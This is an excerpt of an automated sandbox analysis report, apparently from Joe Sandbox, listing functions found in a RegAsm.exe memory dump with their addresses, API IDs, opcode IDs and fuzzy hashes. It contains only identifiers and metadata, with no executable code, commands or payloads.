                                                                                                • Instruction Fuzzy Hash: DBE117B1E00215CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB99
                                                                                                Function 0041D8D8 Relevance: .5, Instructions: 499COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
                                                                                                • Instruction ID: 0a10cce7f6b7f4c9e5a99d8e2b4a5133f7361f2e21e3c94240870ffe1abc1756
                                                                                                • Opcode Fuzzy Hash: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
                                                                                                • Instruction Fuzzy Hash: FAE105B1E00615CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB98
                                                                                                Function 0043FD70 Relevance: .3, Instructions: 347COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
                                                                                                • Instruction ID: 0795aabbeeca3c289a54d5a983081f6cc9b815f424e4503ad834db78cbe5b8b0
                                                                                                • Opcode Fuzzy Hash: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
                                                                                                • Instruction Fuzzy Hash: 46B1FF39B04211CFCB08CF78E8902AAB7B2FF8A324F1985BDD94593351C775A861CB85
                                                                                                Function 0043FE00 Relevance: .3, Instructions: 339COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
                                                                                                • Instruction ID: 8f12c1f11cf7dd9d5989c678c09bce864ea8bb7899150d07336210a81ccf9f3f
                                                                                                • Opcode Fuzzy Hash: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
                                                                                                • Instruction Fuzzy Hash: 2AB11E39A04205CFDB08CF78D8902AEB7B2FF8A314F19857DD94593391D735A922CB85
                                                                                                Function 004406F0 Relevance: .3, Instructions: 305COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: e85f12f7bbac3723ecb9eee596fb1eeda3fecaf8cb6cd1164115649647f81f7d
                                                                                                • Instruction ID: bbaad09b7466ea8e443d8553dc44a5451933c837b4ca1b8c359bd5f9b3e4a5a9
                                                                                                • Opcode Fuzzy Hash: e85f12f7bbac3723ecb9eee596fb1eeda3fecaf8cb6cd1164115649647f81f7d
                                                                                                • Instruction Fuzzy Hash: 478115756083018BE714DF19C890A2BB7A2FFD5710F19852DEAC49B395EB38DC61CB86
                                                                                                Function 0042BF13 Relevance: .2, Instructions: 160COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d79f1fd880ab180e1b863fa2a9d981922e66a5893552c9cd54a43db72e04df75
                                                                                                • Instruction ID: 1ae5c22645a0c49bea9d6a70653e44e8157fd1e252da5b34c0afae31fd87a2fe
                                                                                                • Opcode Fuzzy Hash: d79f1fd880ab180e1b863fa2a9d981922e66a5893552c9cd54a43db72e04df75
                                                                                                • Instruction Fuzzy Hash: 314129A4204790CBE7328B3A98E0B737FE0EF27305F48198DE4E78B646D3299405CB59
                                                                                                Function 0041B57D Relevance: .2, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c7e0094a64ed9e0f308886f35ab180eb3d940b80439b08ae9969d5e3e11de77b
                                                                                                • Instruction ID: d8b4a6cdd0763d1df8515212ee66b27a55189a0bec8caba65ff171ec82452c36
                                                                                                • Opcode Fuzzy Hash: c7e0094a64ed9e0f308886f35ab180eb3d940b80439b08ae9969d5e3e11de77b
                                                                                                • Instruction Fuzzy Hash: D23138745047904BD7368B3584A17737FE09F2B308F58489ED1D387293D22A9549C796
                                                                                                Function 0040CC7A Relevance: .1, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1780199113-0
                                                                                                • Opcode ID: 94b07ba9958116a24f49aa2ce181052b6958ac39138e9011af663e1bf14a50e6
                                                                                                • Instruction ID: 6b5d6437c4fa7b8805f8ed77d50acdad1f0dd5a7239fa4c95c8d74861a36b3c0
                                                                                                • Opcode Fuzzy Hash: 94b07ba9958116a24f49aa2ce181052b6958ac39138e9011af663e1bf14a50e6
                                                                                                • Instruction Fuzzy Hash: 0531E4EAF405405BE5057A232863A6F21674BD071CF48103EF84A272C3ED7DB916959F
                                                                                                Function 00432070 Relevance: .1, Instructions: 118COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 33cc46eaab1da60d5c7c303c1f4bff1ac88459165d933fbad2b388fb389fe25a
                                                                                                • Instruction ID: 1166d7d1cf2a9c2f689b228294c5ddb55241fb8fb130d34f92ce9a1e81a5b4f1
                                                                                                • Opcode Fuzzy Hash: 33cc46eaab1da60d5c7c303c1f4bff1ac88459165d933fbad2b388fb389fe25a
                                                                                                • Instruction Fuzzy Hash: 0D814CB451A7808FE374DF05D59869FBBE0FB8A308F11891ED4984B350CBB86549CF9A
                                                                                                Function 00436210 Relevance: .1, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                • Instruction ID: 63507484b2069e2e8211a278e3cf8cd1c2c15e4e039033c761ca6b325ddcdd3c
                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                • Instruction Fuzzy Hash: 94112C336041D50ED3119D3C8500566BFD30AD7334F1BD3DAF4B8972D2D6268D8A8359
                                                                                                Function 0042AAC0 Relevance: .1, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
                                                                                                • Instruction ID: a0f30dc86e724eb7f88f9efd602dd5de4cd53b28ec3d007000181f31979604c4
                                                                                                • Opcode Fuzzy Hash: 7b5d740ace398df56c1bc651b30677a1090a792db8fb55b3a5b1b7746f8ad41c
                                                                                                • Instruction Fuzzy Hash: 67019EB1B0031197E6209E25A5C1B27B6A96F94708F18003EED0657342DB7DFC24C29B
                                                                                                Function 0043C990 Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b6d6b89a0769f86010591fd06291181582dea7eebbe521dc95f02f92bd725890
                                                                                                • Instruction ID: ef255d715ab18d882adc5ea52eeea8cbfa11f5837c70251ee56aeac1239934a6
                                                                                                • Opcode Fuzzy Hash: b6d6b89a0769f86010591fd06291181582dea7eebbe521dc95f02f92bd725890
                                                                                                • Instruction Fuzzy Hash: 410126B5B052264BD720EE55ECC073F7756A7DE711F1EA07AD48077305D2348C419399
                                                                                                Function 0041C300 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                • Instruction ID: 3b5a2521859e6f9e2b7c42681b895aeeefce9f58c49972f42ecf2407dd3de83c
                                                                                                • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                • Instruction Fuzzy Hash: 91F03160104B914AD7328F3985643B3FFE09B13218F545A4DC9E357AD2D36AD14A8798
                                                                                                Function 0043EDC1 Relevance: .0, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
                                                                                                • Instruction ID: 6759ef11ba54ebcff8aa8f6da36673660d6dd1d1c904dc71617b67ba0d321406
                                                                                                • Opcode Fuzzy Hash: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
                                                                                                • Instruction Fuzzy Hash: EC01B174E412688BCB24CF66E8912BEB7B1FF56305F186068E482FB380DB358C05CB59
                                                                                                Function 0042C850 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
                                                                                                • Instruction ID: 934d56785e493b3be4b0c9c008a8aca41c7e0e8933f1bbf3a4c9d2d3fb154c99
                                                                                                • Opcode Fuzzy Hash: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
                                                                                                • Instruction Fuzzy Hash: 16F0F0244086938ADB059F2980A0776FBA1AF23345F2C41DEC4C0AB393CB2AC8068758
                                                                                                Function 0042E0DA Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                • Instruction ID: 53e9e5a03a9e822e66d5819fe35fee1f40f302e6fc978103a9a9be73ad9cdb27
                                                                                                • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                • Instruction Fuzzy Hash: C7F065105087F28ADB234B3E54606B3AFE09B63120B581BD6C8E19B3C7C3199497C36A
                                                                                                Function 0042D116 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
                                                                                                • Instruction ID: e2807706931cebe5a4fd8447433720849932be0b4ea6b6dd525263aa63fc0ea0
                                                                                                • Opcode Fuzzy Hash: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
                                                                                                • Instruction Fuzzy Hash: 270149306042428BD344CF38CCA056BFBA1EB83324F08C79DC45687796C638C442C799
                                                                                                Function 0040C805 Relevance: .0, Instructions: 14COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
                                                                                                • Instruction ID: 2cc704b116e4bd3b8fd511eeb7f6c98f4211d06ad42a95779158915a2f3845ef
                                                                                                • Opcode Fuzzy Hash: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
                                                                                                • Instruction Fuzzy Hash: C6C0123C583840DF83088F20EC08879B374BB0B202B006824E807E33A2CB22A511AA6E
                                                                                                Function 004237D6 Relevance: .0, Instructions: 9COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
                                                                                                • Instruction ID: b006575f33bb30629b5eebf8556c7f8348362c77d274ae0a1f7cd2f0d910ddfd
                                                                                                • Opcode Fuzzy Hash: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
                                                                                                • Instruction Fuzzy Hash: 92B092B4A1C2018A87088F00E140039EAB4629F202F30A02E908A63215C225C1058A8E
                                                                                                Function 0043315D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant
                                                                                                • String ID: A$B$B$D$K$M$j$q$w$y
                                                                                                • API String ID: 1927566239-3160828158
                                                                                                • Opcode ID: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
                                                                                                • Instruction ID: 1c928e62d6be9c8abd40ab69893dd7e66488cb55e0e55af33186cf6b993705b4
                                                                                                • Opcode Fuzzy Hash: eddacfeeedbf2f75f6d5a413a3fd0e74a564a643395569db151e54d21141464b
                                                                                                • Instruction Fuzzy Hash: 6241287050CBC18AD335DB38845879EBFD16BD2214F188A9DE2E94B3E2D7788145CB57
                                                                                                Function 0043240F Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString
                                                                                                • String ID: 0$a$c$e$f$g
                                                                                                • API String ID: 2525500382-100324306
                                                                                                • Opcode ID: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
                                                                                                • Instruction ID: 2beeffe621b162477516d1a3ffd6e32473519446922c4ca7b5322f15d7df1e3d
                                                                                                • Opcode Fuzzy Hash: 6fa382de4c939dc68479ac497997f55f83f35014caf28410cf75d298f2d01ba0
                                                                                                • Instruction Fuzzy Hash: EB91812110DBC28DD3328A7C595879BBED16BA7234F484B9EE0E98B3E6D7704106C767
                                                                                                Function 00432A42 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit
                                                                                                • String ID: C$C$P$T
                                                                                                • API String ID: 2610073882-3051599793
                                                                                                • Opcode ID: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
                                                                                                • Instruction ID: 97d45b2a61606388edab5b45fc9f71e82de55712b11621588c9e0c32b5ea6509
                                                                                                • Opcode Fuzzy Hash: 70cc15cec2ffaa4e64ca4ef94809e37c86eda4dcb3d81504480f7fa9456d32e2
                                                                                                • Instruction Fuzzy Hash: 0141E52000C7C18AD3728B38845979FBFE06B96324F488A9DD4ED8B3D2DB754149DB53
                                                                                                Function 004345DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-3916222277
                                                                                                • Opcode ID: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
                                                                                                • Instruction ID: a44d6496935459a921f5505b3ec94aa74778db30aba9446cb93c37adee0bb457
                                                                                                • Opcode Fuzzy Hash: 21c571957f9eedbc13ecd4bfc36bc2f66f2a3654bfb69307476122a183b7950a
                                                                                                • Instruction Fuzzy Hash: D0317DF49143149FDB00EFA8D98561EBBF4BB89704F11852EE898DB364D374A948CF86